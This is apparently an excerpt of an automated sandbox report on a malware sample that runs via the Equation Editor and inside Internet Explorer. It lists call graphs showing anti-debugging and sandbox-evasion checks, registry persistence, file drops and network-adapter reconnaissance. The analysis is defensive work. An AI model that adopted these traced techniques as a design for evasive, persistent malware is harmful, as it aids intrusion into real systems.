      • Part of subcall function 617B1319: GetModuleHandleA.KERNEL32(?,?,00000000,00000000), ref: 617B13A0
      • Part of subcall function 617B1319: GetLastError.KERNEL32(?,00000000,00000000), ref: 617B13AD
      • Part of subcall function 617B1319: LoadLibraryExA.KERNEL32(?,00000000,00000008,?,00000000,00000000), ref: 617B13BB
      • Part of subcall function 617B1319: GetProcAddress.KERNEL32(?,00000000,?,00000000,00000000), ref: 617B13F1
      • Part of subcall function 617B1319: GetProcAddress.KERNEL32(?,?,?,00000000,00000000), ref: 617B1411
      • Part of subcall function 617B1319: GetLastError.KERNEL32(?,00000000,00000000), ref: 617B1461
    • UnmapViewOfFile.KERNEL32(?), ref: 617B12DC
    • CloseHandle.KERNEL32(?), ref: 617B12E5
    Memory Dump Source
    • Source File: 00000002.00000002.479478668.617B1000.00000020.sdmp, Offset: 617B0000, based on PE: true
    • Associated: 00000002.00000002.479470190.617B0000.00000002.sdmp
    • Associated: 00000002.00000002.479489530.617B4000.00000002.sdmp
    • Associated: 00000002.00000002.479502718.617B5000.00000004.sdmp
    • Associated: 00000002.00000002.479514676.617B6000.00000008.sdmp
    • Associated: 00000002.00000002.479527170.617C2000.00000004.sdmp
    • Associated: 00000002.00000002.479536546.617C4000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_617b0000_EQNEDT32.jbxd

    Analysis Process: iexplore.exe PID: 3444 Parent PID: 3420

    Execution Graph

    Execution Coverage:20.5%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:19.3%
    Total number of Nodes:491
    Total number of Limit Nodes:5

    Graph

    execution_graph 6458 4f3aad 6461 4f3ab5 6458->6461 6459 4f3b0b 6460 4f382c 10 API calls 6459->6460 6462 4f3b82 6459->6462 6460->6462 6461->6459 6463 4f382c 10 API calls 6461->6463 6463->6459 6293 4f3c0f 6294 4f3c1a 6293->6294 6295 4f3c1f 6293->6295 6297 4f59e2 6294->6297 6298 4f5a07 6297->6298 6299 4f5a14 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 6297->6299 6298->6299 6300 4f5a0b 6298->6300 6299->6300 6300->6295 6307 4f3a6a 6310 4f3a72 6307->6310 6308 4f3b0b 6309 4f382c 10 API calls 6308->6309 6312 4f3b82 6308->6312 6309->6312 6310->6308 6310->6312 6313 4f382c 6310->6313 6314 4f3861 6313->6314 6315 4f383b 6313->6315 6316 4f3897 InterlockedCompareExchange 6314->6316 6320 4f389f 6314->6320 6321 4f388a Sleep 6314->6321 6330 4f385a 6314->6330 6317 4f393f InterlockedCompareExchange 6315->6317 6315->6330 6316->6314 6316->6320 6318 4f3932 Sleep 6317->6318 6319 4f3948 6317->6319 6318->6317 6322 4f3952 _amsg_exit 6319->6322 6331 4f395c 6319->6331 6323 4f38bd __initterm_e 6320->6323 6324 4f38b4 _amsg_exit 6320->6324 6321->6316 6322->6330 6329 4f38e0 _initterm 6323->6329 6323->6330 6326 4f38f6 6324->6326 6325 4f3996 InterlockedExchange 6325->6330 6327 4f38fe InterlockedExchange 6326->6327 6326->6330 6327->6330 6328 4f3980 free 6328->6325 6329->6326 6330->6308 6331->6325 6331->6328 6471 51662c 6472 516632 6471->6472 6473 516638 6471->6473 6475 516653 6472->6475 6476 516664 6475->6476 6477 51665a free 6475->6477 6476->6473 6477->6476 6482 4f380a malloc 6483 4f3824 6482->6483 6335 4f314a __CxxFrameHandler 6484 4f3a28 6485 4f3a30 6484->6485 6486 4f382c 10 API calls 6485->6486 6489 4f3b82 6485->6489 6487 4f3a51 6486->6487 6487->6489 6490 4f382c 10 API calls 6487->6490 6491 4f3b0b 6487->6491 6488 4f382c 10 API calls 6488->6489 6490->6491 6491->6488 6491->6489 6494 4f355c 6495 4f356e 6494->6495 6497 4f357c @_EH4_CallFilterFunc@8 6494->6497 6496 4f32a0 ___swprintf_l 4 API calls 6495->6496 6496->6497 6502 4f5d09 6503 4f32a0 ___swprintf_l 4 API calls 6502->6503 6504 4f5d1d 6503->6504 6505 4f32a0 ___swprintf_l 4 API calls 6504->6505 6506 4f5d27 6505->6506 6498 4f3b21 6499 4f3b26 6498->6499 6500 4f382c 10 API calls 6499->6500 6501 4f3b82 6499->6501 6500->6501 6367 4f3af2 6368 4f3af7 6367->6368 6369 4f382c 10 API calls 6368->6369 6370 4f3b0b 6369->6370 6371 4f382c 10 API calls 6370->6371 6372 4f3b82 6370->6372 6371->6372 6051 4f13f5 IsDebuggerPresent 6052 4f15d6 6051->6052 6053 4f143d 6051->6053 6143 4f32a0 6052->6143 6055 4f1459 6053->6055 6128 4f26f1 printf 6053->6128 6058 4f158c 6055->6058 6059 4f1471 6055->6059 6056 4f15e7 6132 4f1c8f ??2@YAPAXI memset 6058->6132 6059->6052 6061 4f1478 CreateThread 6059->6061 6065 4f148b 6061->6065 6226 4f120f CreateEventW 6061->6226 6063 4f15f1 17 API calls 6064 4f15a7 ??3@YAXPAX 6063->6064 6076 4f1584 6064->6076 6065->6065 6066 4f14cf ??2@YAPAXI 6065->6066 6068 4f14f0 6066->6068 6067 4f15c2 UnmapViewOfFile CloseHandle 6067->6052 6079 4f268d memset 6068->6079 6075 4f1559 6075->6052 6104 5163da 6075->6104 6123 511024 6075->6123 6076->6052 6076->6067 6080 4f26d0 6079->6080 6081 4f32a0 ___swprintf_l 4 API calls 6080->6081 6082 4f1527 ??3@YAXPAX 6081->6082 6083 4f1a6d ??2@YAPAXI memset 6082->6083 6084 4f1aab memcpy 6083->6084 6084->6084 6085 4f1ad6 6084->6085 6086 4f1adf memcpy 6085->6086 6087 4f1af7 6085->6087 6086->6087 6088 4f1b15 ??2@YAPAXI 6087->6088 6091 4f1afb ??3@YAXPAX 6087->6091 6147 4f1b6d 6088->6147 6092 4f32a0 ___swprintf_l 4 API calls 6091->6092 6093 4f1538 6092->6093 6094 4f15f1 6093->6094 6095 4f1604 6094->6095 6096 4f161d CreateFileMappingA MapViewOfFile 6095->6096 6103 4f1549 ??3@YAXPAX 6095->6103 6097 4f1641 6096->6097 6096->6103 6168 4f1864 memmove 6097->6168 6099 4f1646 6172 4f1694 6099->6172 6102 4f1654 UnmapViewOfFile CloseHandle 6102->6103 6103->6075 6184 51d480 6104->6184 6110 516477 6111 517fbe 45 API calls 6110->6111 6112 51648e 6111->6112 6113 511024 16 API calls 6112->6113 6114 51649b memset GetLocalTime 6113->6114 6115 5164dc 6114->6115 6116 5135d4 554 API calls 6115->6116 6117 516520 6115->6117 6118 51650d GetLocalTime 6115->6118 6116->6115 6119 513409 WinHttpCloseHandle WinHttpCloseHandle WinHttpCloseHandle WinHttpCloseHandle WinHttpCloseHandle 6117->6119 6118->6115 6118->6117 6120 51652c 6119->6120 6121 51a460 __swprintf_c_l SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6120->6121 6122 51653d 6121->6122 6122->6076 6124 511043 6123->6124 6125 51107f time srand 6124->6125 6209 511098 ??2@YAPAXI memset UrlMkGetSessionOption 6125->6209 6127 511094 6127->6076 6129 4f2721 6128->6129 6130 4f32a0 ___swprintf_l 4 API calls 6129->6130 6131 4f278d 6130->6131 6131->6055 6133 4f1ccd memcpy 6132->6133 6133->6133 6134 4f1cf8 6133->6134 6135 4f1d19 6134->6135 6136 4f1d01 memcpy 6134->6136 6137 4f1d1d ??3@YAXPAX 6135->6137 6138 4f1d37 ??2@YAPAXI 6135->6138 6136->6135 6141 4f32a0 ___swprintf_l 4 API calls 6137->6141 6140 4f1b6d 12 API calls 6138->6140 6140->6137 6142 4f1596 6141->6142 6142->6063 6144 4f32ab SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6143->6144 6145 4f32a8 6143->6145 6144->6056 6145->6056 6148 4f1b7c __EH_prolog3_GS 6147->6148 6149 4f1bb4 ??2@YAPAXI memset 6148->6149 6150 4f1c89 6148->6150 6151 4f1c79 6149->6151 6152 4f1bf6 6149->6152 6164 4f5cc7 6150->6164 6160 4f1a3c 6151->6160 6159 4f1fde ??2@YAPAXI ??2@YAPAXI 6152->6159 6157 4f1c39 6158 4f1c44 ??2@YAPAXI memcpy 6157->6158 6158->6151 6159->6157 6167 4f5c4a 6160->6167 6162 4f1a48 ??3@YAXPAX ??3@YAXPAX 6163 4f1a6a 6162->6163 6163->6150 6165 4f32a0 ___swprintf_l 4 API calls 6164->6165 6166 4f1c8e 6165->6166 6166->6091 6167->6162 6169 4f188e 6168->6169 6170 4f18c9 6168->6170 6169->6170 6171 4f18a4 memmove 6169->6171 6170->6099 6171->6169 6173 4f16bc 6172->6173 6177 4f16c2 6172->6177 6174 4f32a0 ___swprintf_l 4 API calls 6173->6174 6176 4f1650 6174->6176 6175 4f16ce memset 6175->6177 6176->6102 6176->6103 6177->6173 6177->6175 6178 4f1717 GetModuleHandleA 6177->6178 6181 4f1753 6177->6181 6178->6177 6179 4f1728 GetLastError LoadLibraryExA 6178->6179 6179->6177 6180 4f17dc GetLastError 6179->6180 6180->6173 6182 4f1762 GetProcAddress 6181->6182 6183 4f1785 GetProcAddress 6181->6183 6182->6177 6182->6181 6183->6173 6183->6177 6185 5163ea memset GetTempPathA 6184->6185 6186 51a729 6185->6186 6187 51a73a 6186->6187 6188 51a741 _errno 6186->6188 6187->6188 6191 51a763 6187->6191 6193 51a775 6187->6193 6189 51a74b 6188->6189 6201 51a441 6189->6201 6191->6188 6192 516457 6195 51a79d 6192->6195 6193->6192 6194 51a786 _errno 6193->6194 6194->6189 6196 51a7b5 _errno 6195->6196 6198 51a7ae 6195->6198 6196->6198 6197 51a441 __swprintf_c_l 5 API calls 6197->6198 6198->6196 6198->6197 6199 51a7fe 6198->6199 6200 51a7ee _errno 6198->6200 6200->6198 6202 51a39b OutputDebugStringA 6201->6202 6205 51a460 6202->6205 6204 51a43f 6204->6192 6206 51a46b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6205->6206 6207 51a468 6205->6207 6206->6204 6207->6204 6210 5110f8 6209->6210 6212 5110d3 6209->6212 6216 51a476 6210->6216 6212->6210 6212->6212 6214 5110e3 MultiByteToWideChar 6212->6214 6215 511116 ??3@YAXPAX 6214->6215 6215->6127 6218 511113 6216->6218 6221 51a48a 6216->6221 6217 51a48f _errno 6219 51a499 6217->6219 6218->6215 6222 51a441 __swprintf_c_l 5 API calls 6219->6222 6220 51a4c5 memset 6220->6217 6223 51a4d9 6220->6223 6221->6217 6221->6220 6224 51a4b4 memcpy 6221->6224 6222->6218 6223->6218 6225 51a4de _errno 6223->6225 6224->6218 6225->6219 6227 4f13d9 6226->6227 6228 4f1249 GetLastError 6226->6228 6230 4f32a0 ___swprintf_l 4 API calls 6227->6230 6228->6227 6229 4f125a memset GetModuleFileNameW CreateFileW 6228->6229 6229->6227 6231 4f12a9 GetFileSize ??2@YAPAXI memset ReadFile CloseHandle 6229->6231 6232 4f13eb 6230->6232 6233 4f12f1 6231->6233 6250 4f1000 memset GetSystemDirectoryA 6233->6250 6238 4f342f 7 API calls 6239 4f132c CreateDirectoryW 6238->6239 6240 4f342f 7 API calls 6239->6240 6241 4f1345 CreateDirectoryW 6240->6241 6242 4f342f 7 API calls 6241->6242 6243 4f135e CreateFileW 6242->6243 6244 4f137f CreateFileW 6243->6244 6245 4f137c 6243->6245 6246 4f139c WriteFile 6244->6246 6247 4f13b7 WaitForSingleObject 6244->6247 6248 4f13b1 CloseHandle 6245->6248 6246->6248 6247->6233 6249 4f13d0 ??3@YAXPAX 6247->6249 6248->6247 6249->6227 6279 4f3337 6250->6279 6253 4f3337 7 API calls 6254 4f1075 6253->6254 6255 4f3337 7 API calls 6254->6255 6256 4f1087 memset SHGetSpecialFolderPathA 6255->6256 6257 4f3337 7 API calls 6256->6257 6258 4f10c8 GetShortPathNameA 6257->6258 6259 4f3337 7 API calls 6258->6259 6260 4f10ee 6259->6260 6261 4f3337 7 API calls 6260->6261 6262 4f1100 RegOpenKeyExA 6261->6262 6263 4f1200 6262->6263 6264 4f113e memset RegQueryValueExA 6262->6264 6266 4f32a0 ___swprintf_l 4 API calls 6263->6266 6265 4f1194 6264->6265 6268 4f11d7 RegSetValueExA 6265->6268 6269 4f11f4 RegCloseKey 6265->6269 6267 4f120d SHGetSpecialFolderPathW 6266->6267 6270 4f342f 6267->6270 6268->6269 6269->6263 6271 4f3447 _errno 6270->6271 6273 4f3440 6270->6273 6272 4f3451 6271->6272 6275 4f3287 ___swprintf_l 5 API calls 6272->6275 6273->6271 6274 4f346c 6273->6274 6277 4f3483 6273->6277 6274->6271 6276 4f1313 CreateDirectoryW 6275->6276 6276->6238 6277->6276 6278 4f349b _errno 6277->6278 6278->6272 6280 4f334f _errno 6279->6280 6284 4f3348 6279->6284 6281 4f3359 6280->6281 6288 4f3287 6281->6288 6283 4f3371 6283->6280 6284->6280 6284->6283 6285 4f3383 6284->6285 6286 4f1064 6285->6286 6287 4f3394 _errno 6285->6287 6286->6253 6287->6281 6289 4f31e1 OutputDebugStringA 6288->6289 6290 4f32a0 ___swprintf_l 4 API calls 6289->6290 6291 4f3285 6290->6291 6291->6286 6373 510424 6374 510443 6373->6374 6379 51a318 memcpy 6374->6379 6378 51048b 6380 51a2ef memcpy 6379->6380 6381 51a334 6379->6381 6382 51a307 6380->6382 6383 51a460 __swprintf_c_l 4 API calls 6381->6383 6385 51a319 memcpy 6382->6385 6384 510485 6383->6384 6386 51a306 6384->6386 6385->6380 6385->6381 6391 51a307 6386->6391 6387 51a319 memcpy 6388 51a2ef memcpy 6387->6388 6389 51a334 6387->6389 6388->6391 6390 51a460 __swprintf_c_l 4 API calls 6389->6390 6392 51a399 6390->6392 6391->6387 6392->6378 6393 4f5ce1 6394 4f32a0 ___swprintf_l 4 API calls 6393->6394 6395 4f5cf2 6394->6395 6396 4f59bd 6399 4f3620 6396->6399 6398 4f59dd 6400 4f364b 6399->6400 6401 4f36c2 6400->6401 6403 4f35ee RtlUnwind 6400->6403 6401->6398 6404 4f3603 6403->6404 6404->6401 6519 4f39b3 6520 4f39bf 6519->6520 6521 4f3a51 6520->6521 6522 4f382c 10 API calls 6520->6522 6524 4f39df 6520->6524 6521->6524 6525 4f382c 10 API calls 6521->6525 6526 4f3b0b 6521->6526 6522->6521 6523 4f382c 10 API calls 6523->6524 6525->6526 6526->6523 6526->6524 6535 4f3a14 6536 4f37c6 _XcptFilter 6535->6536 6537 4f3a25 6536->6537 6426 4f3b42 6429 4f37c6 6426->6429 6428 4f3b53 6430 4f37e2 6429->6430 6431 4f37d5 _XcptFilter 6429->6431 6430->6428 6431->6428 6559 4f0400 6572 4f31a6 6559->6572 6564 4f2737 80 API calls 6565 4f0475 6564->6565 6566 4f2737 80 API calls 6565->6566 6567 4f0487 6566->6567 6568 4f31a6 5 API calls 6567->6568 6569 4f04a2 6568->6569 6570 4f2737 80 API calls 6569->6570 6571 4f04c8 6570->6571 6573 4f3287 ___swprintf_l 5 API calls 6572->6573 6574 4f0430 6572->6574 6573->6574 6575 4f2737 6574->6575 6578 4f274f 6575->6578 6576 4f2721 6577 4f32a0 ___swprintf_l 4 API calls 6576->6577 6580 4f0464 6577->6580 6578->6576 6587 4f2a05 CreateToolhelp32Snapshot 6578->6587 6580->6564 6588 4f2a40 memset memset Process32FirstW 6587->6588 6589 4f2a39 6587->6589 6590 4f2f7e CloseHandle 6588->6590 6592 4f2a8b 6588->6592 6591 4f32a0 ___swprintf_l 4 API calls 6589->6591 6590->6589 6593 4f2763 6591->6593 6596 4f2f63 Process32NextW 6592->6596 6597 4f2f77 6592->6597 6643 4f3413 6592->6643 6646 4f3197 6592->6646 6593->6576 6598 4f2fa1 ??2@YAPAXI 6593->6598 6596->6592 6596->6597 6597->6590 6599 4f2fd0 memset 6598->6599 6600 4f2fde 6598->6600 6601 4f2fe0 GetAdaptersInfo 6599->6601 6600->6601 6602 4f3012 memset 6601->6602 6603 4f2ff4 ??3@YAXPAX ??2@YAPAXI GetAdaptersInfo 6601->6603 6604 4f3097 6602->6604 6607 4f302d 6602->6607 6603->6602 6605 4f30a2 strstr 6604->6605 6606 4f309b ??3@YAXPAX 6604->6606 6608 4f30b8 strstr 6605->6608 6609 4f3133 6605->6609 6606->6605 6607->6604 6607->6605 6716 4f331b 6607->6716 6608->6609 6611 4f30cc strstr 6608->6611 6612 4f32a0 ___swprintf_l 4 API calls 6609->6612 6611->6609 6613 4f30e0 strstr 6611->6613 6614 4f276c 6612->6614 6613->6609 6615 4f30f4 strstr 6613->6615 6614->6576 6618 4f27e5 RegOpenKeyExW 6614->6618 6615->6609 6616 4f3108 strstr 6615->6616 6616->6609 6617 4f311c strstr 6616->6617 6617->6609 6619 4f2824 GetLastError printf 6618->6619 6620 4f283e memset RegQueryValueExW 6618->6620 6621 4f28e6 6619->6621 6622 4f2876 6620->6622 6623 4f28db RegCloseKey 6620->6623 6625 4f32a0 ___swprintf_l 4 API calls 6621->6625 6624 4f3197 7 API calls 6622->6624 6623->6621 6627 4f2882 wcsstr 6624->6627 6626 4f2775 6625->6626 6626->6576 6635 4f28fc 6626->6635 6628 4f2899 wcsstr 6627->6628 6629 4f2897 6627->6629 6630 4f28af wcsstr 6628->6630 6631 4f28ad 6628->6631 6629->6628 6632 4f28c5 wcsstr 6630->6632 6633 4f28c3 6630->6633 6631->6630 6632->6623 6634 4f28d9 6632->6634 6633->6632 6634->6623 6636 4f2989 6635->6636 6637 4f29b7 6636->6637 6638 4f298f RegOpenKeyExW 6636->6638 6640 4f29c3 6637->6640 6641 4f29cf RegOpenKeyExW 6637->6641 6638->6636 6639 4f29a5 RegCloseKey 6638->6639 6639->6636 6640->6576 6641->6637 6642 4f29e5 RegCloseKey 6641->6642 6642->6637 6652 4f33ab 6643->6652 6647 4f31a4 _errno 6646->6647 6649 4f31c1 6646->6649 6648 4f3287 ___swprintf_l 5 API calls 6647->6648 6651 4f31b9 6648->6651 6649->6647 6650 4f31d3 _wcslwr 6649->6650 6650->6651 6651->6592 6653 4f33c0 _errno 6652->6653 6654 4f33bb 6652->6654 6655 4f33cc 6653->6655 6654->6653 6656 4f33e5 6654->6656 6657 4f3287 ___swprintf_l 5 API calls 6655->6657 6662 4f5757 6656->6662 6659 4f33d6 6657->6659 6659->6592 6661 4f3405 _errno 6661->6655 6663 4f5772 6662->6663 6665 4f5769 6662->6665 6664 4f577a _errno 6663->6664 6663->6665 6666 4f3287 ___swprintf_l 5 API calls 6664->6666 6673 4f4c63 6665->6673 6672 4f33f4 6666->6672 6668 4f57c3 6670 4f57ed 6668->6670 6668->6672 6693 4f5ab4 _fileno 6668->6693 6671 4f5ab4 _write_multi_char 13 API calls 6670->6671 6670->6672 6671->6672 6672->6659 6672->6661 6674 4f4cc6 _errno 6673->6674 6689 4f4ce7 __aulldvrm 6673->6689 6675 4f3287 ___swprintf_l 5 API calls 6674->6675 6676 4f4cdc 6675->6676 6678 4f32a0 ___swprintf_l 4 API calls 6676->6678 6677 4f570b 6677->6674 6677->6676 6679 4f5733 6678->6679 6679->6668 6680 4f4fd1 6683 4f500e 6680->6683 6687 4f52a6 malloc 6680->6687 6681 4f56d4 free 6681->6689 6682 4f5113 mbtowc 6682->6689 6708 4f3e59 6683->6708 6684 4f4bdd ferror ___swprintf_l 6684->6689 6685 4f50a9 isleadbyte 6685->6689 6687->6683 6689->6674 6689->6676 6689->6677 6689->6680 6689->6681 6689->6682 6689->6684 6689->6685 6690 4f4c09 ferror _errno ___swprintf_l 6689->6690 6691 4f5629 mbtowc 6689->6691 6692 4f4b97 ferror ___swprintf_l 6689->6692 6690->6689 6691->6689 6692->6689 6694 4f5ae8 6693->6694 6695 4f5ad0 _errno 6693->6695 6696 4f5aec _errno 6694->6696 6698 4f5afa 6694->6698 6703 4f5adc 6695->6703 6696->6703 6697 4f5b76 6700 4f5bf9 _write 6697->6700 6701 4f5b80 6697->6701 6698->6697 6699 4f5b3f _isatty 6698->6699 6702 4f5b4d _errno 6698->6702 6698->6703 6699->6697 6699->6702 6700->6703 6704 4f5baa 6701->6704 6705 4f5b97 _write 6701->6705 6706 4f3287 ___swprintf_l 5 API calls 6702->6706 6703->6670 6704->6703 6707 4f5bd8 _lseeki64 6704->6707 6705->6703 6706->6703 6707->6703 6710 4f3e7d _itoa 6708->6710 6711 4f3eb1 6710->6711 6711->6711 6712 4f3eb8 _snprintf 6711->6712 6713 4f3eef 6712->6713 6714 4f32a0 ___swprintf_l 4 API calls 6713->6714 6715 4f3f08 6714->6715 6715->6668 6719 4f32b6 6716->6719 6720 4f32cb _errno 6719->6720 6721 4f32c6 6719->6721 6722 4f32d7 6720->6722 6721->6720 6723 4f32f0 6721->6723 6724 4f3287 ___swprintf_l 5 API calls 6722->6724 6729 4f4ae8 6723->6729 6726 4f32e1 6724->6726 6726->6607 6728 4f330d _errno 6728->6722 6730 4f4b02 6729->6730 6731 4f4af9 6729->6731 6730->6731 6732 4f4b0a _errno 6730->6732 6738 4f3ff4 6731->6738 6734 4f3287 ___swprintf_l 5 API calls 6732->6734 6735 4f32ff 6734->6735 6735->6726 6735->6728 6736 4f4b4e 6736->6735 6737 4f5ab4 _write_multi_char 13 API calls 6736->6737 6737->6735 6739 4f4057 _errno 6738->6739 6747 4f4078 __aulldvrm 6738->6747 6740 4f4062 6739->6740 6743 4f3287 ___swprintf_l 5 API calls 6740->6743 6741 4f406d 6744 4f32a0 ___swprintf_l 4 API calls 6741->6744 6742 4f4a9d 6742->6739 6742->6741 6743->6741 6745 4f4ac5 6744->6745 6745->6736 6746 4f42f0 isleadbyte 6746->6747 6747->6739 6747->6741 6747->6742 6747->6746 6748 4f3db2 13 API calls _write_multi_char 6747->6748 6749 4f4a75 _errno 6747->6749 6750 4f437f 6747->6750 6751 4f4a40 free 6747->6751 6753 4f4a8d _errno 6747->6753 6754 4f3f0a 12 API calls ___swprintf_l 6747->6754 6758 4f3de5 13 API calls _write_multi_char 6747->6758 6759 4f3e0b 14 API calls ___swprintf_l 6747->6759 6748->6747 6749->6740 6752 4f43bc 6750->6752 6756 4f461f malloc 6750->6756 6751->6747 6755 4f3e59 ___swprintf_l 6 API calls 6752->6755 6753->6740 6754->6747 6757 4f46b5 6755->6757 6756->6752 6757->6736 6758->6747 6759->6747 6452 4f5cfc 6453 4f1a3c 2 API calls 6452->6453 6454 4f5d08 6453->6454

    Executed Functions

    Function 00517535, Relevance: 112.1, APIs: 1, Strings: 63, Instructions: 97

    Control-flow Graph

    APIs
      • Part of subcall function 0051668C: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00020019,00000000,?,005169F7,00000080,00000000,?,?,005169F7,?,?), ref: 005166CF
      • Part of subcall function 0051668C: RegCloseKey.ADVAPI32(00000000,?,?,005169F7,?,?,?,00000000,00020019), ref: 005166DA
      • Part of subcall function 0051663C: malloc.MSVCRT ref: 0051663D
    • GetSystemInfo.KERNELBASE(00000000,80000002,?,?,00000000,00020019,00000340), ref: 00517672
      • Part of subcall function 00516653: free.MSVCRT(00000000,00513A3A), ref: 0051665E
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 005177AB, Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 190 5177ab-5177db ??2@YAPAXI@Z GetAdaptersInfo 191 5177dd-5177fe ??3@YAXPAX@Z ??2@YAPAXI@Z GetAdaptersInfo 190->191 192 517816-51783d call 51663c call 51a70d 190->192 191->192 193 517800-517804 191->193 203 517a0d-517a10 192->203 204 517843-517846 192->204 195 51780f-517811 193->195 196 517806-51780e ??3@YAXPAX@Z 193->196 198 517a11-517a1d call 51a460 195->198 196->195 203->198 205 517849-51784e 204->205 205->205 206 517850-51785d 205->206 207 517860-517865 206->207 207->207 208 517867-51787e realloc 207->208 209 517881-517886 208->209 209->209 210 517888-51790e call 51a70d * 2 209->210 215 517914 210->215 216 5179fa-5179fe 210->216 217 517919-51791f 215->217 216->204 218 517a04-517a0c ??3@YAXPAX@Z 216->218 219 517922-517927 217->219 218->203 219->219 220 517929-517934 219->220 221 517937-51793c 220->221 221->221 222 51793e-517952 realloc 221->222 223 517955-51795a 222->223 223->223 224 51795c-51798e call 51a70d 223->224 227 5179e3-5179e8 224->227 228 517990-517996 227->228 229 5179ea-5179f4 227->229 231 517999-51799e 228->231 229->216 230 517916 229->230 230->217 231->231 232 5179a0-5179b1 realloc 231->232 233 5179b4-5179b9 232->233 233->233 234 5179bb-5179e0 call 51a70d 233->234 234->227
    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 005177C2
    • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 005177D3
    • ??3@YAXPAX@Z.MSVCRT ref: 005177E0
    • ??2@YAPAXI@Z.MSVCRT ref: 005177E8
    • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 005177F7
    • ??3@YAXPAX@Z.MSVCRT ref: 00517809
      • Part of subcall function 0051663C: malloc.MSVCRT ref: 0051663D
    • ___swprintf_l.LIBCMT ref: 00517830
    • realloc.MSVCRT ref: 00517875
    • ___swprintf_l.LIBCMT ref: 005178C8
    • ___swprintf_l.LIBCMT ref: 005178FB
    • realloc.MSVCRT ref: 00517949
    • ___swprintf_l.LIBCMT ref: 00517980
    • realloc.MSVCRT ref: 005179A8
    • ___swprintf_l.LIBCMT ref: 005179D6
    • ??3@YAXPAX@Z.MSVCRT ref: 00517A07
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    • Ethernet adapter Local Area Connection:, xrefs: 00517822
    • Name. . . . . . . . . . . . . . . : , xrefs: 005178E9
    • Subnet Mask . . . . . . . . . . . : , xrefs: 00517965
    • Physical Address. . . . . . . . . : , xrefs: 005178D1
    • Default Gateway . . . . . . . . . : , xrefs: 005179C4
    • %s%s, xrefs: 005179CD
    • %s%s%s%s%s%s, xrefs: 005178F2
    • %02X-%02X-%02X-%02X-%02X-%02X, xrefs: 005178BD
    • IPv4 Address. . . . . . . . . . . : , xrefs: 0051796E
    • Description . . . . . . . . . . . : , xrefs: 005178DD
    • %s%s%s%s, xrefs: 00517977
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00513ABC, Relevance: 21.4, APIs: 6, Strings: 8, Instructions: 444string

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 500 513abc-513b36 call 51a79d strstr 503 513b38-513b4e call 51a79d 500->503 504 513b53-513b65 strstr 500->504 511 513ddd-513de6 503->511 506 513b81-513bb5 call 51a729 * 2 strstr 504->506 507 513b67-513b7c call 51a79d 504->507 527 513ffd-51400b call 517fbe 506->527 528 513bbb-513bd7 strstr 506->528 514 513c19-513c23 507->514 516 513de8-513dea 511->516 517 513df0-513e09 call 517fbe 511->517 518 513dca-513dcd 514->518 519 513c29-513c45 call 517fbe 514->519 516->517 522 513fbe-513fc3 call 518133 516->522 533 513fd9-513fdc 517->533 534 513e0f 517->534 523 513dcf-513dd2 518->523 541 513c47-513c48 519->541 542 513c7f 519->542 536 513fc8-513fd7 call 513409 522->536 523->511 535 513dd4-513dd7 523->535 556 51400c-51400e 527->556 529 513bdd-513c14 memset * 2 call 51a729 528->529 530 513ff1-513ffb call 517fbe 528->530 529->514 530->556 538 513eff-513f21 call 51207e 533->538 539 513fe2-513fe3 533->539 544 513e15-513e17 534->544 545 513ec7-513ee5 call 511da2 534->545 535->511 535->522 559 51400f-51401d call 51a460 536->559 571 513f23-513f2e call 5141f0 538->571 572 513f34-513f36 call 5133c0 538->572 549 513fe9-513fea 539->549 550 513f3b-513f5e call 51207e 539->550 548 513c82-513c9a call 514020 541->548 554 513c4a-513c4b 541->554 542->548 551 513e19-513e1c 544->551 552 513e29 544->552 580 513ef8-513efa call 5133c0 545->580 581 513ee7-513ef2 call 5141f0 545->581 575 513c69-513c74 call 518133 548->575 584 513c9c-513ca2 call 5133c0 548->584 562 513fec 549->562 563 513f7b-513f9b call 512176 549->563 588 513f60-513f6c call 5141f0 550->588 589 513f72-513f79 call 5133c0 550->589 558 513e2c-513e48 call 514020 551->558 564 513e1e-513e1f 551->564 552->558 565 513ca7-513cc4 call 511b92 554->565 566 513c4d-513c4e 554->566 556->559 558->575 612 513e4e-513e54 call 5133c0 558->612 562->575 605 513f9d-513fa8 call 5141f0 563->605 606 513fae-513fbb call 5133c0 563->606 576 513e21-513e22 564->576 577 513e59-513e76 call 511b49 564->577 607 513cd3-513cd5 call 5133c0 565->607 608 513cc6-513cd1 call 5141f0 565->608 578 513cda-513cf7 call 511bd3 566->578 579 513c54-513c55 566->579 571->572 571->575 572->550 618 513c79-513c7a 575->618 595 513e24 576->595 596 513e90-513ead call 511bd3 576->596 622 513e89-513e8b call 5133c0 577->622 